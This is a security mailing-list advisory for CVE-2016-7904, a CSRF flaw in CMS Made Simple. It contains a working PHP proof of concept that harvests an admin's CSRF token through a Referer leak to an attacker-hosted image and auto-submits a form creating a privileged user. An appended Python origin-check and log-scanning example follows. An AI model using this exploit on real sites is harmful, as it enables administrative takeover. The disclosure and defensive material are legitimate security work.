Date: Mon, 16 Jan 2017 10:17:29 +0800 (GMT+08:00)
From: "Hongkun Zeng" <>
To: oss-security <>
Subject: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF

Vulnerability: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF
CVE: CVE-2016-7904
Discovered by: Hongkun Zeng (

CMS Made Simple (CMSMS) is a free, open source (GPL) content management system (CMS) to provide developers, programmers and site owners a web-based development and administration area.

This is a security issue in CMSMS. Low privilege users were able to gain control of an administrative session through a CSRF attack.

Add an article and insert an image with the link http://attacker/csrfpoc.php; the Referer would then leak the user's CSRF token.

//File: csrfpoc.php
<?php
session_start();
// The admin's browser fetches this page as the article's image, so the Referer
// carries the CMSMS admin URL, whose query string contains the CSRF token _sk_.
if (isset($_SERVER['HTTP_REFERER']) && !isset($_SESSION['_sk_'])) {
    $parsed_url = parse_url($_SERVER['HTTP_REFERER']);
    $query = isset($parsed_url['query']) ? $parsed_url['query'] : '';
    parse_str($query, $arr);
    if (isset($arr['_sk_'])) {
        $_SESSION['_sk_'] = $arr['_sk_'];
    }
}
?>
<form action='http://localhost:8012/admin/adduser.php' method='POST' id='form' enctype='multipart/form-data'>
<input type="text" name="_sk_" value="<?php echo isset($_SESSION['_sk_']) ? htmlspecialchars($_SESSION['_sk_']) : ''; ?>" />
<input type="text" name="user" value="test" />
<input type="text" name="password" value="123456" />
<input type="text" name="passwordagain" value="123456" />
<input type="text" name="firstname" value="" />
<input type="text" name="lastname" value="" />
<input type="text" name="email" value="" />
<input type="text" name="active" value="1" />
<input type="text" name="sel_groups[]" value="1" />
<input type="text" name="sel_groups[]" value="2" />
<input type="text" name="sel_groups[]" value="3" />
<input type="text" name="copyusersettings" value="-1" />
<input type="text" name="submit" value="submit" />
</form>
<!-- auto-submit the form with the harvested token -->
<script>document.getElementById('form').submit();</script>



Best Regards,
Hongkun Zeng
hongkun.zeng (at)
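A defender-side check for the pattern described in this report, written here as an added example and not part of CMSMS or the original post: a state-changing request to the admin area is accepted only when its Origin (or, failing that, Referer) matches the site's own origin, and the same rule is run over web-server access-log lines to flag forged admin POSTs after the fact. SITE_ORIGIN is an assumption taken from the PoC's form action, and the log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit

# Assumption: the CMSMS instance lives at this origin (taken from the PoC's form action).
SITE_ORIGIN = "http://localhost:8012"

def request_origin(headers):
    """scheme://host[:port] of the requester: Origin first, then Referer; None if neither is usable."""
    origin = headers.get("Origin")
    if origin and origin.lower() != "null":
        return origin.rstrip("/").lower()
    referer = headers.get("Referer")
    if referer and referer != "-":
        u = urlsplit(referer)
        if u.scheme and u.netloc:
            return f"{u.scheme}://{u.netloc}".lower()
    return None

def is_cross_site_post(method, path, headers):
    """True for a state-changing admin request whose source is not SITE_ORIGIN.
    A request with neither Origin nor Referer is also treated as cross-site: for
    admin actions an unknown source is not good enough to accept."""
    if method.upper() not in ("POST", "PUT", "DELETE") or not path.startswith("/admin/"):
        return False
    return request_origin(headers) != SITE_ORIGIN.lower()

# Combined Log Format: ip ident user [time] "method path proto" status bytes "referer" "ua"
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$')

def flag_cross_site_admin_posts(lines):
    """Return (line_no, ip, path, referer) for each logged admin POST that fails the origin check."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, method, path, _status, referer, _ua = m.groups()
        if is_cross_site_post(method, path, {"Referer": referer}):
            hits.append((n, ip, path, referer))
    return hits

# Constructed sample log lines (not real traffic): a legitimate admin POST, the PoC's
# forged POST (Referer is the attacker page), and a POST that carries no Referer at all.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jan/2017:10:17:29 +0800] "POST /admin/adduser.php HTTP/1.1" 302 0 "http://localhost:8012/admin/listusers.php?_sk_=c0ffee" "Mozilla/5.0"',
    '192.0.2.10 - - [16/Jan/2017:10:18:02 +0800] "POST /admin/adduser.php HTTP/1.1" 302 0 "http://attacker/csrfpoc.php" "Mozilla/5.0"',
    '192.0.2.10 - - [16/Jan/2017:10:18:40 +0800] "POST /admin/adduser.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in flag_cross_site_admin_posts(SAMPLE_LOG):
        print("cross-site admin POST:", hit)
```

The origin check closes the forged-POST half of the issue; the token-leak half is closed by keeping _sk_ out of URLs (or at least sending a Referrer-Policy of same-origin from the admin pages) so that a browser fetching an attacker-hosted image never sends it.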
